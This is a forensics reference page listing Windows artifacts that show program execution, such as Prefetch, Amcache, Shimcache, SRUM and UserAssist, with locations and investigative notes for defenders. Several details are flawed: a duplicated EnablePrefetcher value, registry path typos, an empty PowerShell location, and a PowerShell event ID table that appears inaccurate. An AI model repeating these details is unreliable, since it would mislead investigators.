Home Evidence of Execution
Post
Cancel

Evidence of Execution

Techniques that can be used to discover evidence in support of program execution post-breach or during an attack.

Windows

ActivitiesCache.db (Windows Timeline)

Windows 10 introduced a background feature that records recently used applications and accessed files over a 30 day duration in a “timeline” accessible via the “WIN+TAB” key. The data is recorded in a SQLite database. Windows 11 removed the “WIN+TAB” functionality, however the ActivitiesCache.db still remains.

Research identified that Windows Server 2016 also maintains an ActivitiesCache.db file, however ActivityOperation, Activity_PackageId, and Activity entries were not recorded.

WindowsXP781011
    
Server2003R22008R22012R2201620192022
     

Location

1
2
3
4
5
# Local Account
C:\Users\%PROFILE%\AppData\Local\ConnectedDevicesPlatform\L.%PROFILE%\ActivitiesCache.db

# Online Account
C:\Users\%PROFILE%\AppData\Local\ConnectedDevicesPlatform\%CID%\ActivitiesCache.db

Interpretation and Investigative Notes

  • Files within the L.%USERPROFILE% directory.
    • ActivitiesCache.db: SQLite Database
    • ActivitiesCache.db-wal: ‘Write ahead’ Log (Holds activity events prior to pushing them to the database - Reboot system to write to database)
    • ActivitiesCache.db-shm: ‘Shared memory’ file
  • The database contains evidence such as;
    • ActivityType: Activity performed (ExecuteOpen, InFocus, CopyPaste, etc)
    • Executable: Parent application used to open or execute file
    • DisplayText: Title of file or application
    • ContentInfo: Possible content information, not always present
    • Timestamps: StartTime, EndTime, and Duration are some of the most interesting recorded events.

Tools

Sources

AmCache.hve

ProgramDataUpdater (a task associated with the Application Experience Service) uses the registry file Amcache.hve to store data during process creation. Details of program installation and execution are stored.

WindowsXP781011
  
Server2003R22008R22012R2201620192022
     

Location

1
C:\Windows\AppCompat\Programs\Amcache.hve

Interpretation and Investigative Notes

  • Amcache.hve - Keys = Amcache.hve\Root\File\{Volume GUID}\#######
  • Entry for every executable run, full path information, files $StandardInfo Last Modification Time, and Disk Volume the executable was run from.
  • First Run Time = Last Modification Time of key
  • SHA1 hash of executable also contained in the key.

Tools

Sources

Background Activity (BAM) and Desktop Activity Moderator (DAM)

Windows BAM and DAM are updated when Windows boots and controls the activity of background applications and is found on all Windows devices and is managed by C:\Windows\System32\drivers\bam.sys. DAM is only populated with details of applications on Windows Tablets and Mobile devices although the empty registry key will be present on host devices.

BAM and DAM entries are only stored during a session, with events clearing upon reboot or when entries have been present in the key for over 7 days. Another item to consider is that executables hosted on removable media are not recorded in the BAM or DAM.

WindowsXP781011
    
Server2003R22008R22012R2201620192022
     

Location

1
2
3
4
5
# BAM
HKLM\System\CurrentControlSet\Services\bam\state\UserSettings\{SID}

# DAM
HKLM\System\CurrentControlSet\Services\dam\state\UserSettings\{SID}

CurrentControlSet may be substituted by ControlSet001 or ControlSet002. The ControlSet00x are alternating backups of the CurrentControlSet.

Interpretation and Investigative Notes

Provides full path of the executable file that was run on the system and the last time date time group of execution.

Tools

Sources

Jump List

The Windows task bar (Jump List) is engineered to allow users to “jump” or access items they have frequently or recently. This can include files, applications, and directories to name the major items of significance for forensic investigations.

The data stored in the AutomaticDestinations directory contains a unique file for each application prepended with a unique Application ID (AppID) correlated to the associated application, such as the following example which depicts the AppID of Windows Explorer 8.1: f01b4d95cf55d32a.automaticDestinations-ms.

WindowsXP781011
  
Server2003R22008R22012R2201620192022
   

Location

1
C:%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

Interpretation and Investigative Notes

  • The Jump List files contain information relating to program execution times, execution count and local file paths of the application being investigated.
  • AppIDs are universally used across Windows and Server versions from 2007/2012 onwards. Correlations for common applications can be found here.

Tools

Sources

LastVisitedMRU

The LastVisitedMRU is responsible for tracking specific executables used by an application to open files documented under the OpenSaveMRU registry key. In addition, each value tracks the directory location for the last file that was accessed by that application. The information can provide forensic insight into an applications execution and file and folder interaction.

WindowsXP781011 
  
Server2003R22008R22012R2201620192022
 

Location

1
2
3
4
5
6
7
# WINDOWS: XP
# SERVER: 2003
NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDIg32\LastVisitedMRU

# WINDOWS: 7+
# SERVER: 2008+
NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDIg32\LastVisitedPidlMRU

The NTUSER.DAT file is unique for each user on the target host.

Interpretation and Investigative Notes

Tracks the application executables used to open files in OpenSaveMRU and the last file path used, for example: Notepad.exe was last run under the C:\%USERPROFILE%\Desktop directory.

Tools

Sources

Prefetch

Increases performance of a system by pre-loading code pages of commonly used applications. Cache Manager monitors all files and directories referenced for each application or process and maps them into a .pf file. Utilized to know an application was executed on a system.

  • Limited to 128 files on XP and Windows 7
  • Limited to 1024 files on Windows 8
  • <EXE_NAME>-<HASH>.pf
WindowsXP781011
 
Server2003R22008R22012R2201620192022
  * * * * * 

Although prefetch is available on Windows Servers, it is disabled by default. To enable Prefetch on Windows Servers (I was unable to get this working on Windows Server 2022), the following steps can be taken. However, keep in mind that it will need to be enable prior to any nefarious activities occurring and will not provide retrospective artifacts. Prefetch can also be disabled by default when the system detected an SSD being used, enabling can be configured by the same.

  1. Update or create the EnablePrefetcher registry key in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters
  2. Set the EnablePrefetcher key value: 0 = Disabled, 1 = Application launch prefetching enabled, 2 = Boot prefetching enabled, 2 = Application launch and boot prefetching enabled.

Location

1
C:\Windows\Prefetch

Interpretation and Investigative Notes

  • Each .pf file will include last time of execution, number of times run, and device and file handles used by the program.
  • Date/Time file by that name and path was first executed
    • Creation Date of .pf file (-10 seconds)
  • Date/Time file by that name and path was last executed
    • Windows 8+ will contain last 8 times of execution.

Tools

Sources

RecentApps

Windows 10 tracked Program execution via the RecentApps registry key for particular versions.

WindowsXP781011
     

Only Microsoft Windows 10 versions V1607-1709 appear to populate the RecentApps registry key.

Server2003R22008R22012R2201620192022
       

Location

1
NTUSER.DAT\Software\Microsoft\Windows\Current Version\Search\RecentApps

Interpretation and Investigative Notes

  • Each GUID key points to a recent application.
    • AppID = Name of Application
    • LastAccessTime = Last execution time in UTC
    • LaunchCount = Number of times executed

Tools

Sources

Shimcache (AppCompatCache)

The Shimcache (also known as AppCompatCache) allows applications to call properties from earlier Windows versions, avoiding the need to rewrite an application when the host operating system is upgraded. When an application launches, it checks for compatibility and creates a Shimcache item that maintains the executable’s last modification date, file path, and file size.

WindowsXP781011
 
Server2003R22008R22012R2201620192022
 

Location

1
2
3
4
5
# WINDOWS: XP
SYSTEM\CurrentControlSet\Control\SessionManager\AppCompatability

# WINDOWS: 7+
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache

Interpretation and Investigative Notes

This key contains any executable that runs on the Windows system. This key can be used to determine which computers malware or other applications of interest was executed on. Furthermore, depending on the interpretation of time-based data, you may be able to ascertain the last time the system was executed or that activity occurred.

  • Windows XP has a maximum of 96 entries, with the LastUpdateTime field being changed when the executable is run.
  • Windows 7 and later systems have a maximum of 1024 entries., However the LastUpdateTime field does not exist.

The registry key itself is not displayed in an easy to read format if utilizing the native regedit.exe tool, therefore parsing with a third party tool is a requirement to analyze the data.

Entries do not always indicate execution as they may be shimmed prior to execution when first dropped on disk. Execution should be be proven via multiple methods where able.

Tools

Sources

System Resource Usage Monitor (SRUM)

The System Resource Usage Monitor (SRUM) records 30 to 60 days of historical system performance, including details in support of applications run, user account responsible for each, and application and bytes sent/received per application per hour. A lot of this information assists in populating the ‘App History’ tab on the Task Manager.

WindowsXP781011
   
Server2003R22008R22012R2201620192022
      

Location

1
2
3
4
5
# Registry - Artifacts cannot be parsed from the registry location
SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SRUM\Extensions{d10ca2fe-xxxx-xxxx-xxxx-xxxxxxxxxxxx}

# Filepath
C:\Windows\System32\SRU\

Interpretation and Investigative Notes

  • SRUM Extension GUIDs
    • 973F5D5C-1D90-4944-BE8E-24B94231A174 - Windows Network Data Usage Monitor
    • D10CA2FE-6FCF-4F6D-848E-B2E99266FA86 - Push Notifications (WPN) Provider
    • D10CA2FE-6FCF-4F6D-848E-B2E99266FA89 - Application Resource Usage Provider
    • DD6636C4-8929-4683-974E-22C046A43763 - Windows Network Connectivity Usage Monitor
    • FEE4E14F-02A9-4550-B5CE-5FA2DA202E37 - Energy Usage Provider

Tools

Sources

UserAssist

GUI-based programs launched from the desktop are tracked in the launcher on a windows system

WIN: XP, 7, 8, 10, 11
SRV: NULL

Location

1
2
3
HKEY_USERS{SID}\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist{GUID}\Count

HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist{GUID}\Count

Interpretation and Investigative Notes

  • All values are ROT-13 Encoded
    • .RKR = .exe
    • .YAX = .lnk
  • GUID for XP
    • 75048700 - Active Desktop
  • GUID for Win7/8/10/11
    • CEBFF5CD - Executable File Execution
    • F4E57C4B - Shortcut File Execution

Tools

Sources

PowerShell

These events can be useful for tracking the use of PowerShell on a device, including the specific cmdlets, scripts, and providers that are being invoked. By analyzing these events, you can get a sense of which users are using PowerShell, and what actions they are performing.

WIN: XP, 7, 8, 10, 11
SRV: NULL

Location

1

Interpretation and Investigative Notes

Event LogEvent IDDescriptionDetails Recorded
PowerShell.evtx4103A cmdlet was invoked.The name of the cmdlet, the parameters passed to the cmdlet, and the security identifier (SID) of the user who invoked the cmdlet.
PowerShell.evtx4104A script was executed.The name and path of the script, the parameters passed to the script, and the security identifier (SID) of the user who executed the script.
PowerShell.evtx4105A script block was invoked.The script block that was invoked, the parameters passed to the script block, and the security identifier (SID) of the user who invoked the script block.
PowerShell.evtx4106A provider was loaded.The name of the provider that was loaded, the security identifier (SID) of the user who loaded the provider, and the logon ID.
PowerShell.evtx4107A provider was unloaded.The name of the provider that was unloaded, the security identifier (SID) of the user who unloaded the provider, and the logon ID.
PowerShell.evtx4108A provider was invoked.The name of the provider that was invoked, the security identifier (SID) of the user who invoked the provider, and the logon ID.
PowerShell.evtx4109A provider was refused.The name of the provider that was refused, the security identifier (SID) of the user who attempted to load the provider, and the logon ID.

Tools

-

Sources

This post is licensed under CC BY 4.0 by the author.